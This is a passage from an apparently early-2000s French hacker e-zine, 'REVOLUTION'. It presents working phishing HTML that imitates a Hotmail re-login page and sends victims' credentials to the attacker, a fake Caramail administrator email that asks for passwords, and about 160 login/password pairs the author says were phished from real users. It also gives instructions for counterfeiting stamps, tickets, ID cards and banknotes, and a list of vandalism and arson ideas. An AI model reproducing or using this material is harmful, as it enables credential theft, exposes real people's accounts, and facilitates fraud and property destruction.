le numéro de l'appelant, ainsi que la date et l'heure de l'appel, si vous voulez porter plainte 
par exemple.

      Attention : cette technique ne marche que si votre répondeur ne s'est pas mis en marche et 
si le téléphone a au moins sonné deux fois.

      Et elle ne marche pas non plus si l'appelant a fait le 3651.


*** Etre au courant de ce qui se passe chez FT ***

      En faisant joujou sur mon téléphone, j'ai trouvé deux numéros qui concernent FT :

      - 1010 : le service téléphonique des actionnaires de Farce Telecom où l'on peut savoir la 
valeur de l'action FT ou joindre un conseiller FT pour le faire chier, puisque c'est un numéro 
gratis.

      - 0800123456 : le service des employés de FT, où on apprend tout les projets de FT et où 
l'on entend des foutaises pas possible du genre quand FT se congratule d'être la meilleure 
entreprise telecom.


*** Si on a vraiment trop bu ***

      Ben c'est simple : faites le 18 ;o) 





			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                      Social Engineering 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	    *** INTRODUCTION AU SE ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Le Social Engineering (SE), ou Génie Social est un art qui sert à obtenir des 
informations, non pas en utilisant les failles informatiques d'un ordinateur comme en hacking, 
mais en utilisant les failles psychologiques d'une personne (bêtise, naïveté, frustration, etc) 
et en usurpant l'identité de quelqu'un ou en opérant carrément sous IF (Identité Fausse, ce qui 
signifie que vous choisissez un nom au pif sans même vous soucier de savoir si quelqu'un porte 
ce nom).

	En clair pour les débiles légers : le SE consiste à duper quelqu'un afin d'obtenir des 
informations comme son mot de passe ou son numéro de carte bancaire. 

	En ce qui me concerne, je pense que le SE est tout un art et c'est d'ailleurs ma 
discipline préférée dans le domaine UnderGround, parce que, premièrement, c'est une des 
techniques les plus excitantes (Va-t-on réussir à garder son sérieux ? Va-t-on être assez 
crédible ?) et les plus drôles (Y'a des gens tellement cons ou tellement manipulable que ça en 
devient marrant), et deuxièmement, parce que c'est fou le nombre d'infos qu'on peut obtenir 
grâce au SE.

	Il existe plusieurs "supports" pour pratiquer le SE : le téléphone, les e-mails, la poste 
et le visu. 

	Ah ! J'oubliais : le SE est absolument illégal, et vous pouvez être condamné pour 
usurpation d'identité, abus de confiance, abus de biens sociaux, et j'en passe ! L'amende sera 
d'un minimum de 200 000 F, plus le remboursement des sommes escroquées, plus, parfois, des 
dommages et intérêts... Mais bon : on s'en fout !!! :oP




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	     *** LE SE PAR E-MAILS ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Le SE par e-mails sert en général à obtenir les mots de passe d'utilisateurs en se faisant
passer pour un administrateur du serveur visé.

	La chose la plus importante pour qu'une attaque de ce type réussisse est que la prose et 
l'orthographe soient soignés, parce qu'on n'a encore jamais vu d'admin qui ékri kom çoa (quoique
chez Multimania...).

	Mon avis, dans le cas du SE par mails, c'est qu'il suffit d'obtenir le pass de la 
messagerie de la cible, afin de pouvoir lire ses mails, ainsi, on peut apprendre un tas de trucs
sur elle (comme ça, on peut la faire chanter si un jour elle nous menace ou qu'on veut obtenir 
quelque chose d'elle), et, en général, le pass de la messagerie est le même que le pass du site 
(Enjoy :oP !!!), donc le SE est une forme de hacking. Enfin, il y a un truc à ne pas oublier 
avec ce genre d'attaque au génie social : plus vos cibles seront nombreuses, donc plus vous 
enverrez de requêtes de pass, plus vous obtiendrez de réponses, c'est mathématique (j'aime pas 
les maths, mais bon, ça fait bien de le dire LOL). 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	  *** OBTENIR UN PASS HOTMAIL ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Merci à Clad Strife qui a créé ce hack.

	Pour obtenir le mot de passe d'un utilisateur Hotmail en utilisant cette technique, il 
suffit d'envoyer le code-source HTML ci-dessous à votre source au format HTML en remplaçant le 
USER_GUEST@HOTMAIL.COM par votre adresse e-mail, et si votre cible marche dans la combine, vous 
recevrez son login et son mot de passe. 


<html><head></head> <body bgcolor="#ffffff" link="#000099" vlink="#000099"> <table border=0 
cellpadding=5 cellspacing=5 width=508 height=90%> <tr valign=middle><th colspan=2> <font face=
"Arial, Helvetica" size="5">We're Sorry, We Cannot<br> Process Your Request</font> </th></tr> 
<tr valign=middle><td align=center> <font face="Arial, Helvetica" size="3">Reason:&nbsp;</font> 
<font face="Arial, Helvetica" size="3" color="#ff0000"><b>Time expired for your account. Please 
re-login.</b></font><br> </td></tr> <tr valign="middle"><td align="center"> <FORM METHOD="POST" 
NAME="hotmail" ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi" target="_parent"> 

<INPUT TYPE="hidden" NAME="recipient" VALUE=" USER_GUEST@HOTMAIL.COM ">

<INPUT TYPE="hidden" NAME="subject" VALUE="Hotmail Password"> <INPUT TYPE="hidden" 
NAME="return_link_url" VALUE="http://www.hotmail.com/cgi-bin/start/"> <table cellpadding="0" 
cellspacing="5" border="0"> <tr><td> <font face="Arial, Helvetica" size="2">Login Name:</font>
<br><input type="text" name="login" size="16" maxlength="16"> </td><td><font face="Arial, 
Helvetica" size="2">Password:</font><br><input type="password" name="passwd" size="16" 
maxlength="16">&nbsp;<input type="submit" value="Enter"></td><tr> </table></FORM></td></tr> <tr 
valign=middle><th colspan=2 align=center> <font face="Arial, Helvetica" size="3">Return to <a 
href="http://www.hotmail.com" target="_parent">Hotmail's Homepage</a>. </font></th></tr></table>
<font size=2 color=black>1996-1999. Hotmail© all rights reserved.</font> 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	  *** OBTENIR UN PASS CARAMAIL ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Bon, ben pour ça, y'a plusieurs techniques...


*** TECHNIQUE UN ***

	Vous prenez pas la tête : envoyez le source pour les comptes Hotmail à des gens sur 
Cacamail, y'aura toujours des idiots pour marcher dans la combine.


*** TECHNIQUE DEUX ***

	Si vous connaissez bien le HTML et que vous avez du temps à perdre, reprenez l'idée du 
hack de Hotmail en l'appliquant à Caramail ; moi, j'ai autre chose à faire... :o) 


*** TECHNIQUE TROIS ***

	Créez-vous une boîte sous Caramail en prenant le pseudo "Administrateur Caramail" et en 
choisissant une adresse e-mail du genre "admin-cara@caramail.com" (surtout : pas de numéro !), 
et envoyez l'e-mail suivant à des dizaines des personnes ; soit envoyez les mails un par un, 
soit envoyez-les tous ensemble, mais en copie invisible, avec, en destinataire visible, un mail 
du genre "hacked-list@caramail.com", en mettant en titre "Problèmes de maintenance" :


Cher(e) abonné(e),

Suite à différents problèmes de maintenance causés par un groupe de pirates informatiques, 
plusieurs informations de notre base de données ont été effacées ; il s'agit de celles se 
trouvant avant la "Question/Réponse" sur les formulaires d'inscription.

C'est pourquoi nous devons vous demander de remplir le questionnaire suivant et de nous le 
retourner en cliquant sur "Répondre" en haut à gauche de votre écran, puis sur "Envoyer", sans 
modifier le sujet du message.

Nom :
Prénom :
Surnom :

Login :
Mot de passe :

Code Postal :
Ville :
Pays :

Date de naissance :

Merci de nous répondre dans les plus brefs délais.

Cordialement,
L'équipe Caramail.


	Moi, j'ai envoyé ça à pas mal de personnes un soir où je me faisais chier dans mon club 
d'informatique, et j'ai obtenu les pass de presque toutes mes cibles (presque, parce que les 
hackers ne marchent pas dans ce genre de trucs), et je vous les livre ci-dessous.

	En tout, il doit y en avoir un peu plus de 160 (164, je crois) ; amusez-vous bien, mais
faites pas de conneries.


		- Login -		   - Password -

		
		flo72				dupas
		c.sax 			chachot
		i.lili			1234
		yoni21  			yoni 
		littlerabbit4  		lili
		hwood  			niambi 
		buffy545  			241187   
		coraillie  			2243 
		grigri35  			1436 
		sarah723  			sacha20 
		zoe.1  			01233 
		picola2  			mimi 
		martin_63  			viateur 
		zora_  			ouin 
		peggy51  			azer 
		fleur.d_orient  		coco 
		bolt6				trunks
		guyard			nana
		greg-z			greg
		belzebuth			jack
		c219				kiker
		punk20			moon
		a.caline 			asterix
		amber24 			020278
		elomany 			charles
		luca75			lucas
		emilie1122 			1984
		mica30 			blanchette
		mirella22 			1032
		macca3 			beatles
		m.mimou 			10050
		madmax80 			13021980
		miss_77 			neuneu
		frab 				arabe
		falbala92 			aaaa
		miss-fine 			prout
		fourrure 			depraved
		bike24 			nothing
		aziz_32 			fati
		rosy126 			onyx
		fanfan343 			1001
		justtotest 			justtote
		encore69              	sexe
		geeepsy			geeepsy
		neo.murphy            	17326167
		ronaldo001            	pires
		kci18                 	pires
		gregbgg               	atb14314
		ebola_33              	tomcatf14
		winnywong             	sarah
		kevin911              	3391
		tr2711                	internet
		just1423              	burton15
		yugo7                 	happy
		thorwald              	ottorahn
		neezer                	cybertraque   
		tetfoutu              	welcome
		cramail               	lesexe77
		epsilon14             	alex
		phoenix000            	albino
		dj_moustafa           	pauly
		b.morbak              	titou
		melissa186            	miloude
		dominion.eva          	armitage
		caca102               	caca    
		gwen.et.sarah         	bsmjsm
		btc_1                 	london
		japiot                	toctoc
		detraque_sexuel       	pacey    
		cardinaldebiere       	63206320
		adil.fouad            	nas2
		fernand17             	jivaro
		matth.dums            	1014
		neo323                	traxdata
		f.lombardo            	6666
		nicoulebrave          	nicgolgo
		rradia                	dada
		pikatchu.eclair       	moogli
		paule39               	paule
		keizers               	4523non2
		bjefferson            	jeffcin
		toto12000             	12000
		beaugosse.chacal      	1230
		coverride             	crash
		oskar666              	predator
		jay_bond_san          	95147852
		firstraider           	raider
		bob_lebo              	bigjoe
		alifox                	intel
		moi699                	cemoi
		max652                	4891
		lyrics_              	denisk
		i-scarface           	iiii
		filyum                	69966
		storm_hk              	130877
		scaneur               	scanneur
		dewey6                	scream         
		daltoboc              	verbatim
		7oqp_pop              	azerty
		x1234x                	1234
		phenixy2k             	iris
		tonysam               	roxane
		derouiche2	      	poporico
		calamite4             	athlon
		mrv1                  	mrvvh
		lolo1814              	boumbo
		mon.cul.vert          	19461991
		x383                  	rugby
		rachel.jolie          	rachel
		super_g               	gyzmo
		alien.51              	fanny
		jarod.17              	cassis1
		hitch5                	urss
		troudemabite          	8989
		zapan5                	ordi
		x_cel3                	1983
		batjo                 	kexjw
		ptite_coquine_1       	7src2qvf
		anghelus              	sugus1
		zia83 			wells 
		brume.2               	massage
		arabis1               	rebellion  
		newneo1            	cana
		trace-de-pneu     	180283
		marco978          	macsim
		a.haha            	popo
		diamant69 		 	nightman 
		angelina20 			120579 
		neo5000 			nagase 
		roche.marion 		marion 
		belokan23 			230682 
		lenou9 			friends 
		totalgear 			groscaca 
		marlboro23 			marl 
		emeline24 			azrael 
		pupuce119 			derby 
		cereal_killer6 		sk8board 
		a.l.y 			220686 
		percevan24 			gumsolla 
		lolitachica 		dogustan 
		dr.desperados 		blink182 
		cleopatre49			chipie
		b.patra 			mistral 
		physis 			momo 
		anti.brain 			chacha 
		karinette.paris 		monbebe 
		qui_gong.jinn 		starwars 
		zoran7 			je t'aim 
		space_bear 			pekin 
		chichou86 			caroline 
		big-body 			muscle 
		gryffondor 			2000at 
		doorskeeper 		1q2w3e4r 
		chokapic 			arrete ! 
		marle2000cool 		stevetre 
		etalon 			noir 
		ben5554 			urss 
		janus888 			welles 
		tony_hawk13 		lulu 
		alycia69			bébé 
		angelina14 			amour 





			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                         D i v e r s 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	  *** LA CONSCIENCE DU HACKER ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Ce texte extêmement célèbre dans la communauté UnderGround a été écrit par The Mentor 
lors de son arrestation le 8 janvier 1986 et publié sous le titre "Lasts Words of The Mentor" ; 
ensuite ce texte traduit par NeurAlien le 8 septembre 1994. 

	Comme il est toujours d'actualité, je le mets ici, et j'encule ceux qui disent que ça 
sert à rien de le mettre parce qu'on le trouve autre part et patati et patata, parce que je mets 
ce que je veux dans mon zine sans avoir de compte à rendre à personne ! Na ! ;oP


	Un autre s'est fait prendre aujourd'hui, c'est partout dans les journaux. "Scandale : un 
adolescent arrêté pour crime informatique, arrestation d'un "hacker" après le piratage d'une 
banque"...

	Satanés gosses, tous les mêmes.

	Mais avez-vous, dans votre psychologie en trois pièces et votre profil technocratique de 
1950, un jour pensé à regarder le monde derrière les yeux d'un hacker ? Ne vous êtes-vous jamais
demandé ce qui l'avait fait agir, quelles forces l'avaient modelé ?

	Je suis un hacker, entrez dans mon monde...

	Le mien est un monde qui commence avec l'école... Je suis plus astucieux que la plupart 
des autres enfants, les conneries qu'ils apprennent me lassent...

	Je suis au collège ou au lycée. J'ai écouté les professeurs expliquer pour la quinzième 
fois comment réduire une fraction. Je l'ai compris. "Non Mme Dubois, je ne peux pas montrer mon 
travail. Je l'ai fait dans ma tête."

	Satané gosse. Il l'a certainement copié. Tous les mêmes.

	J'ai fait une découverte aujourd'hui. J'ai trouvé un ordinateur. Attends une minute, 
c'est cool. Ca fait ce que je veux. Si ça fait une erreur, c'est parce que je me suis planté.

	Pas parce qu'il ne m'aime pas...

	Ni parce qu'il se sent menacé par moi...

	Ni parce qu'il pense que je suis un petit filoux...

	Ni parce qu'il n'aime pas enseigner et qu'il ne devrait pas être là...

	Satanés gosses. Tout ce qu'il fait c'est jouer. Tous les mêmes.

	Et alors c'est arrivé... Une porte s'est ouverte sur le monde... Se précipitant à travers 
la ligne téléphonique comme de l'héroïne dans les veines d'un accro, une impulsion électronique 
est envoyée, on recherche un refuge à l'incompétence quotidienne... un serveur est trouvé.

	Vous vous répetez que nous sommes tous pareils... On a été nourris à la petite cuillère 
de bouffe pour bébé à l'école quand on avait faim d'un steak... Les fragments de viande que l'on 
nous a laissés étaient prémachés et sans goût. On a été dominés par des sadiques ou ignorés par 
des apathiques. Les seuls qui avaient des choses à nous apprendre trouvèrent des élèves 
volontaires, mais ceux-ci sont comme des gouttes dans le desert.

	C'est notre monde maintenant... Le monde de l'électron et de l'interrupteur, la beauté du 
baud. Nous utilisons un service déja existant, sans payer ce qui pourrait être bon marché si ce 
n'était pas la propriété de gloutons profiteurs, et vous nous appelez criminels... 

	Nous explorons... et vous nous appelez criminels. 

	Nous recherchons la connaissance... et vous nous appelez criminels. 

	Nous existons sans couleur de peau, sans nationalité, sans dogme religieux... et vous 
nous appelez criminels.

	Vous construisez des bombes atomiques, vous financez les guerres, vous ne punissez pas 
les patrons de la mafia aux riches avocats, vous assassinez et trichez, vous manipulez et nous 
mentez en essayant de nous faire croire que c'est pour notre propre bien-être, et nous sommes 
encore des criminels.

	Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon crime est celui de 
juger les gens par ce qu'ils pensent et disent, pas selon leur apparence. Mon crime est de vous
surpasser, quelque chose que vous ne me pardonnerez jamais.

	Je suis un hacker, et ceci est mon manifeste. Vous pouvez arrêter cet individu, mais vous
ne pouvez pas tous nous arrêter... après tout, nous sommes tous les mêmes. 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	     *** DEVENEZ FAUSSAIRE ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°


	Alors, pour les réalisations d'arts qui vont suivre, voici ce dont vous aurez besoin :

* Un scanner de la meilleure qualité possible
* Un logiciel de création et de modification d'images
* Une imprimante couleur (laser, si possible)
* Un plastificateur entre 3 et 5 mm (plus ou moins facultatif)


	Commençons par le plus drôle : la création de faux timbres.

	Pour cela, laissez marcher votre imagination : dessinez ce qui vous chante au format qui 
vous chante (mais pas trop grand quand même pour pas trop attirer l'attention), sans oublier les
trucs classiques (prix et logo "République Française", si vous êtes en France) et imprimez-le. 
Ensuite, découpez votre timbre dans la forme qui vous voulez (carré, rectangle, losange, rond, 
étoile, coeur, etc). Vous pouvez vous amusez à découper des dendelures si ça vous fait triper, 
mais ce n'est pas nécessaire. Et c'est fini !

	Rassurez-vous, ça marchera : la poste n'a pas de machine pour reconnaître les timbres, à 
cause de tous les formats et de toutes les formes qui existe ; ce sont les employés qui sont 
chargés de reconnaître les timbres, mais il y a tellement de lettres à contrôler qu'ils ne 
peuvent pas se pencher sur chaque timbre, sans oublier que de nouveaux timbres sortent chaque 
semaine et qu'ils ne peuvent pas tous les connaître...

	Mais soyons paranos : ne laissez jamais votre nom ni votre adresse à l'intérieur ou sur 
l'enveloppe, des fois que.

	Enfin, la petite touche "fuck capitalism and make money" : vendez vos créations 50 
centimes ou 1 franc moins cher que la poste (ça, c'est pour la France, je ne connais pas les 
prix dans les autres pays). 

	Maintenant, passons aux tickets de bus, tram ou métro :

	Scannez un ticket de bus, tram ou métro et imprimez-le en de multiples exemplaires sur du 
papier bristol, et vous avez vos tickets contrefaits. Si vos tickets sont des tickets mensuels,
retouchez-les avec votre logiciel et changez le mois.

	Comme on est tous des enculés de trous du cul (héhéhéhéhé), vendez vos faux tickets un à 
deux francs moins chers que les entreprises de transport en commun de votre ville.

	Pour  être un vrai faussaire, vous devez aussi savoir faire des fausses cartes :

	L'inconvénient de cette technique, c'est qu'on ne peut ni reproduire les reliefs ni 
reproduire les hologrammes (mais si celui qui contrôle votre carte est un peu neu-neu, ça peut 
passer).

	Donc, pour en revenir à nos roustons, gulps !, nos moutons, avoir une fausse carte est 
très pratique si on veut boire de l'alcool "légalement" en boîte quand on est mineur, acheter 
une arme, emprunter un truc sans avoir l'intention de le rendre, commander un truc sous un faux 
nom, ou alors si on se fait pécho en train de chourer dans un magasin :o) etc...

	Pour en venir à la technique : scannez un exemplaire de la carte que vous voulez 
contrefaire (avec la meilleure qualité possible), modifiez ce qui vous dérange (nom, âge, photo,
etc) en respectant la police originelle (grâce à des copier/coller sur un logiciel de traitement
de texte quelconque pour voir laquelle c'est) et imprimez-la avec la meilleure qualité possible
sur du papier bristol ou plastique (ça dépend de la carte que vous contrefaites). Ensuite, 
découpez-la au bon format et plastifiez-la si besoin est (en respectant l'épaisseur de plastique
de la carte d'origine).

	Toujours parce que vous êtes un vieille salope qui nique la société, vendez vos cartes 
(autour de 200-300 balles ou plus suivant la carte et la qualité). Et n'oubliez pas que plus 
vos cartes sont de bonnes qualités plus les clients sont prêts à payer cher. Par contre, 
méfiez-vous si un type vous accoste en vous demandant telle carte et dites que vous ne savez pas
de quoi il parle, et, tant qu'à faire, essayer d'avoir toujours au moins un intermédiaire dans 
vos transactions.

	Enfin, la partie la plus rentable : la contrefaçon de billets ;o)

	Alors, comme pour le reste, scannez des billets avec la meilleure qualité possible, mais 
ne prenez pas les plus gros, parce que bon, on sait jamais, et puis en général, les gens font un
peu plus gaffe au bifton quand il a une grosse valeur, donc ne dépassez pas les billets de 100 
balles (pour les français), mais il me semble que les billets de 50 balles sont les plus 
adaptés, car courant, pas d'une trop forte valeur et un peu passe-partout. 

	Ensuite, retouchez les images de façon à ce qu'elles ressemblent le plus à des biftons, 
en mettant par exemple du gris fluo à la place des bandes d'aluminium ou des trucs dans ce genre,  
mais bon, gardez à l'esprit que vos contrefaçons ne seront pas d'une grande qualité, mais ça 
passera toujours prêt d'une personne non-avertie.

	Maintenant, imprimez-en un bon paquet et faîtes très gaffe en les découpant et en collant 
les deux faces dos à dos.

	La dernière phase consiste à écouler son stock sans se faire niquer ; pour ça, il y a 
plusieurs moyens :

		- Trouvez des petites épiceries ou des petits bureaux de tabac où les gérants 
sont comme qui dirait des débiles légers, et rentrez pénard, achetez un truc pas cher (un paquet
de clopes, par exemple, mais fumer, c'est pô bien :oP ou une barre de chocolat du style les 
barres Mars aux noisettes, c'est trop bon !) et vous ressortez avec votre truc et votre monnaie, 
qui elle, ne sera pas contrefaite.

		- Allez dans des bars ou des cafés et demandez à échanger un de vos biftons 
	contre de la petite monnaie.

		- Proposez à vos potes (enfin, vos connaissances, pas vos potes, c'est bâtard) 
	d'échanger vos biftons contre des pièces.

		- Empruntez du fric et rendez-le sous forme de faux-billets.

		- Réfléchissez, vous trouverez d'autres moyens...

	
	En tout cas, les deux règles d'or sont que personne à part vous ne doit savoir que les 
billets sont faux et qu'il ne faut pas toujours pigeonner la même personne, sinon vous allez 
vous faire pécho, et ça, ça le ferait pas.

	Enfin, un dernier tuyau : froissez vos billets, parce que les billets qui ont une vieille 
apparence n'attirent pas l'attention et ils passent comme une lettre à la poste (surtout quand
cette lettre a un faux timbre... Narf !). 

	Bon, ben ce tutorial s'arrête là ! Bonne carrière les p'tits faussaires !!! 




	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
  	  *** SE DEFOULER UN BON COUP ***
	°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

	Thanks à IGA qui m'a donné l'idée d'écrire cet article.

	Avant de commencer, je précise que je décline toute responsabilité quant à l'utilisation 
de ce qui se trouve dans cet article, parce que faire des bêtises, c'est pô bien !


	Il y a des jours où tout part en couilles, où tout foire, où on est énervé alors qu'on ne 
sait pas pourquoi, où la vie nous emmerde, où il faut qu'on se défoule...

	Le but de cet article est de vous donner des idées afin que vous ne ruminiez dans votre 
coin et que, une fois défoulé, vous alliez mieux :o)

	Enfin, un dernier conseil avant de commencer: vous faites pas choper ;-P


	* Recouvrez une bagnole de fils serpentins (vous savez, les trucs en bombe pour le 
carnaval).

	* Cassez plein de bornes Fuck Telecom puis laissez une trace du genre une phrase écrite par 
terre à la craie qui dit que FT, c'est de la merde (exemple : "France Telecom n'aura plus le 
monopole quand toutes ses bornes seront explosées !").

	* Mettez le feu à toutes les poubelles d'une rue en les remplissant bien de trucs gras pour 
que la fumée soit bien noire et que les habitant croient qu'il y ait un incendie dans le 
quartier.

	* Prenez des légumes genre tomate et des oeufs crus et jetez-les sur les véhicules 
stationnés.

	* Taguez un symbole "Anarchie" ou un pentacle sur des boites aux lettres, puis jetez des 
pétards dedans.

	* Recouvrez une voiture de papier-chiottes, puis vider quelques verres d'eau sucrée 
dessus... Le papier va accrocher la voiture à fond et votre victime n'aura plus qu'à faire un 
lavage au karscher pour enlever le sucre :oP

	* Faites un bon vieux graphe sur le mur de quelqu'un que vous aimez pas.

	* Répandez un produit inflammable pour barbecue sur une grande place, en dessinant un 
pentacle, une tête de mort ou un symbole anarchiste, et mettez-y le feu.

	* Si c'est la période de Noël, vous pouvez vous amusez à casser toutes les illuminations 
de votre quartier une part une.

	* Allez sur un chat de lamers ou sur un chan IRC pourrave et insultez tous le monde, 
floodez, spammez, critiquez, monopolisez la parole, etc.

	* Allez au cimetière et mettez les pieres tombales par terres (ça, par contre, je ne 
cautionne vraiment pas, c'est qu'un délire).

	* Renversez les poubelles dans une zone industrielle.

	* Prenez votre téléphone et, pendant plusieurs heures, emmerdez ceux que vous aimez pas 
(profs, voisins qui font chier, blaireaux de la classe, etc...) en les insultant, en montant des 
canulars, en raccrochant dès qu'ils décrochent, etc.

	* Prenez un tournevis et interchangez les adresses de vos voisins ; vous verrez comme ce
sera drôle quand les uns recevront le courrier des autres et vice-versa.

	* Avec un paint-ball, shootez les lampadaires, les murs, les portes, les boites aux 
lettres, les vélos, les scooters, les voitures, les fenêtres, les arrêts de bus, etc.

	* Si vous connaissez quelqu'un qui a une piscine dans son jardin, remplissez-la de 
peinture et de marmelade... Effet garanti !!!


	Laissons l'imagination faire son oeuvre... Y'a tant de conneries à faire !!! :o)

	Bon défouloir !!! 





			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°

                                           O u t r o 

			    		°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




	Nous arrivons à la fin de cette première issue de REVOLUTION, j'espère que ça vous a plu
et que j'ai pu aider ou divertir la plupart d'entre vous (j'emmerde les autres MDR).

	Je ne sais pas quand paraîtra la seconde comète, mais je pense qu'il y en aura une, parce
que si je m'arrête là, on va dire que je suis un lamer et que j'en sais pas plus que ce que j'ai
écrit dans ce numéro, et pis d'abord, c'est pas vrai, moi, je suis un r34L 3L1t3 h4x0r d3 L4
m0rT et arrêtez de m'embêtez ou je vous floode tous avec Front Page, pis après, je vous nuke 
avec Cute FTP, et si ça vous suffit pas, ben je vous formate votre HD avec Paint Shop Pro, 
alors me faites pas chier ;-D

	Pour conclure ce numéro, je voudrais passer quelques greetz :

		- Angelz, pour son amitié, ses conseils... et nos conneries :o)
		- ACiD BuRN, qui m'a beaucoup aidé et avec qui je me suis tapé de bons délires
		- la mAdteAm et surtout CYBz, qui m'a permi de débuter grâce à son zine
		- les membres de Crashdaweurld, parce qu'ils sont vraiment trop drôles
		- Chaos-Confusion-Savon, pour sa bonne humeur constante
		- H117, juste parce que c'est lui

	
	Sinon, je cherche des gars, des filles, des chiens, des chats, des hermaphrodites,
des homosexuels, des hétéros, des bi-sexuels, des nécrophiles, des cons, des newbies, des
lamers, des Elites, des connards, des débiles, des emmerdeurs, bref : je cherche du monde
pour m'aider à écrire des articles pour mon site ou pour mon zine ; parce que tout seul, je 
crois pas que j'irais bien loin.

	En fait, je cherche surtout du monde qui s'y connait en :

		- Hack sous Linux/UNIX
		- Intrusions de réseaux
		- Phreaking de téléphones portables (c'est mieux si ça marche en France)
		- Cracking (parce que chez moi, le crack, ben c'est la misère totale)
		- Conneries, délires, passer le temps (in)intelligemment, etc...
		- Drague de filles (parce qu'en ce moment, c'est la misère...)
		- Tout ce qui peut se mettre dans un e-zine :o)
		

	Bon, ben j'crois qu'c'est le moment de se quitter,... SNIF... Je suis triste... Je vous
aime tous... Gros bisous... Gros poutoux-poutoux... 

	RENDEZ-VOUS DANS LA PROCHAINE COMETE DE REVOLUTION !!!



      
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°



		#######     #######   ######      ######    #      #   #      #
		#      #   #          #     #    #      #    #    #     #    #
		#      #   #          #      #   #      #     #  #       #  #
		#######     ###       #      #   #      #      ##         ##
		#    #     #          #      #   #      #     #  #       #  #
		#     #    #          #     #    #      #    #    #     #    #
		#      #    #######   ######      ######    #      #   #      #



      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°
      ¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤-¤
      °*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°*°




